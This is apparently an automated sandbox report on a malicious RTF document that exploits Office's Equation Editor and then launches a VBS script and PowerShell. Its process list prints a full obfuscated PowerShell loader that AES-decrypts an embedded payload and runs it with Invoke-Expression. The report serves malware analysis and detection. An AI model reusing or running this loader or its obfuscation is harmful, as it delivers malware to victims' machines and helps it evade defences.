Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
119s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240708-en -
resource tags
arch:x64arch:x86image:win7-20240708-enlocale:en-usos:windows7-x64system -
submitted
23/07/2024, 12:28
Static task
static1
Behavioral task
behavioral1
Sample
e628ee1f2b81b8972f53e2b2785d97a1.rtf
Resource
win7-20240708-en
Behavioral task
behavioral2
Sample
e628ee1f2b81b8972f53e2b2785d97a1.rtf
Resource
win10v2004-20240709-en
General
-
Target
e628ee1f2b81b8972f53e2b2785d97a1.rtf
-
Size
110KB
-
MD5
e628ee1f2b81b8972f53e2b2785d97a1
-
SHA1
0fa0fe5809f166d707fdcf3a2a866b92a761a92b
-
SHA256
8fc89bf19f14cfd251b0023a624d9be2eaf9a41328e7d5c6f1c703fea07c841d
-
SHA512
cfb5abf034fb4105fa1f5b23f40b3070427bb862c701fab29457caf15f1f100be6103d783380490cf6afddc7291db17a75f6ab1e19a82e2650072a94eebb6093
-
SSDEEP
768:I6/gj/IOvpQ0dXHynngGCobrwTsiCmWv8E:IV/IWC0diFRbahWkE
Malware Config
Signatures
-
Blocklisted process makes network request 4 IoCs
flow pid Process 4 2500 EQNEDT32.EXE 7 2708 WScript.exe 9 2708 WScript.exe 10 2128 powershell.exe -
Drops file in System32 directory 1 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE -
pid Process 2128 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Office loads VBA resources, possible macro or embedded object present
-
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
pid Process 2500 EQNEDT32.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2088 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2128 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2128 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 2088 WINWORD.EXE 2088 WINWORD.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 2500 wrote to memory of 2708 2500 EQNEDT32.EXE 33 PID 2500 wrote to memory of 2708 2500 EQNEDT32.EXE 33 PID 2500 wrote to memory of 2708 2500 EQNEDT32.EXE 33 PID 2500 wrote to memory of 2708 2500 EQNEDT32.EXE 33 PID 2708 wrote to memory of 2128 2708 WScript.exe 35 PID 2708 wrote to memory of 2128 2708 WScript.exe 35 PID 2708 wrote to memory of 2128 2708 WScript.exe 35 PID 2708 wrote to memory of 2128 2708 WScript.exe 35 PID 2088 wrote to memory of 2880 2088 WINWORD.EXE 37 PID 2088 wrote to memory of 2880 2088 WINWORD.EXE 37 PID 2088 wrote to memory of 2880 2088 WINWORD.EXE 37 PID 2088 wrote to memory of 2880 2088 WINWORD.EXE 37
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\e628ee1f2b81b8972f53e2b2785d97a1.rtf"1⤵
- Drops file in Windows directory
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2088 -
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵PID:2880
-
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Blocklisted process makes network request
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2500 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\simplethingstohappenedarething.vBS"2⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2708 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI00669725676900661955908584003901CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnI6WdXDNL1QOiTNMpTmj3GP4fuhNEJiNeCYvt+bi9HmaeB+pnzXo0qd3bcCYQwOu26eR2WeL4DLDIoGpCtWrOc3+IDX1Zg1T8lQ87otzzWi+T/L0YPQop+bdw0lY34zryaUifKKDho7O3XAiN5Ag419Dmmeg6FoljemPC/VzaixMzAMGup3hIrL3W90fn7WPFXxNie5Kx1h/OVwYAPqAjt9JkXqX9pbQ8qBPG0Ld8UXKhyyvpnjHr7xbxc/lTGHhyb4O688cdVijjodbdyQvGipBWexdYqjMGvEKkJjIGNV/BdF0foq1Ap3jVAC98mohO7essgjuBtNPtWpwRZHSE0i0ZsQaQ9Ug7cAy5hUChH2uM74rBm+jzd7LXuICbKcNnIY+jOSzeU5ONhicSfpfceKi7ve7gq6922dRWEH5ZMi5PBuhDsZczV74Zr433TL6xRqUg9L9ik5AGPow6bOVE0NZ4/YyzxnXA4tFi+ye8pfPGi1HQ620JFmMlW/c48T6feiLN5jNd8rfxBpSGogQ9RigX9171GY+bMOp0DrmFGnapeguEsSjUysn2kNWx+mSqYYfid6qe5AYvmQWBFSoQMgMO1hPOPkq3+PQilJe+Rn3pq2DZvdUFJY7g04so1tpE4rSIoLYQkcAVoy7zeO/lhOPKETIcY8t6uxGzQFzddMK7RjWzt5OxszXtRmFWRcMMaHM9bB8+3yalrRMMCGsN2NcxqSWkemfeWMMpFrvSi9naLZaW3pjU3mUhnCeSdE8WT3YjSUOhm1aE9zFfB3MDUAqB0WNmkRU9uqU4vxdt8AzP+HoBMAbAwOcWYi/24xV3Z8UTWLXZiwie9jAU0JR0b7n5PogpmxGVPm4t41EjfVWW/MH++PdCq34Vso1KgxJYI6f3oiq26sk4bl5WHvf76uN4aStUk2nQDZEza1bQoAH0IcePgM//31NdQEwyTgU0U9LtqDJdG/4OR1wqXv0l0m7nlkObWp0TGmljp4c0shQ27F4EwDqzXpAMUwzMaDQ+Qt4SqT6m5p8bjU0PrVxspYd/zZtwpNb56tHebQmw93+yZrXvMleQMIRvz7AJOBNZSQUTNq66mmQcoqgA698P+3dbTO3NkxSGI8E/yFdDuOH/LgPcl2hp1jYapVtcegTW1zXuwTs4CITWZF9XAJY/GFglyMPJ1v9ftJ02v7AP8oO6lTN9ESbYYGG4h2UXbk5fqq3o8f3L+ppiVEpxFnqQmbp4UPGq2eR4+ZhHUNAg9DI7b2lGUjZqgl65aFyOCJXVZDG1Gb/Um9HGgVH3jjRRrBzAmSVpcyMSPW+jcD8Ju624QnIjGeV0yHL7g+dzDK/hBBnfcQ2/3GRGFPucwKg10578K0dCz6plSdfhxEQpEndVv1aCVKZXmRLr39XRYMMD9zYJ6QuDUZGGLxN46AqhiaQ==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')3⤵
- Blocklisted process makes network request
- Drops file in System32 directory
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2128
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\NT8UAXPK\paste1[1].txt
Filesize156B
MD5ad6c37ef980373e9bcbd14810fad34bc
SHA19c061a1b3608b7c7f1db7cd06c8246913ee11bda
SHA256ee85057c1a562fc405d03b2b6a651612ac688dff5c9eeae88a0c1e34e17c602c
SHA51230dc26060efcb4fd44be2d74cc4d33654ee0eb9039bd933c80b67afcc938bdba458cfa6bfc43d2ddb2f59dd6f9ddfe66951c56c61709a2dc02eac94e0e2ae97f
-
Filesize
19KB
MD5a75a762391d1af754346fddb10db3eac
SHA119031c985ede96a02d3ddeb813cfcff531e33937
SHA2562f4a0ca8147e2d0644ede162eef4315c71a6c0f2b9605b8a5331c2bde9fddab6
SHA5126a522f67bfa5384746cae0d29dd3abcf3866d002b351993e16f11baa0603afdebf352450d7dcf5a0ad2d314e3ed6247978f11ca4d96df42bf2b0c1d2441b4fa3
-
Filesize
54KB
MD5cfbf2e7faea58e9249d4e5f6520851a2
SHA1b27795e6e6282d7d3888ab39f77ad314139497fc
SHA25689c3771f859200a6c3e2d7aea98d0e4c2c21741d9d2117e47dfc2849523be39a
SHA512c5e71d2cd63debf13c2c57807aaeb819f2077423c8ce86770c7d803054fa9f02304fff646ea8f018198089ac2ca1d565a2faab93916be86ff357c6c529e5c164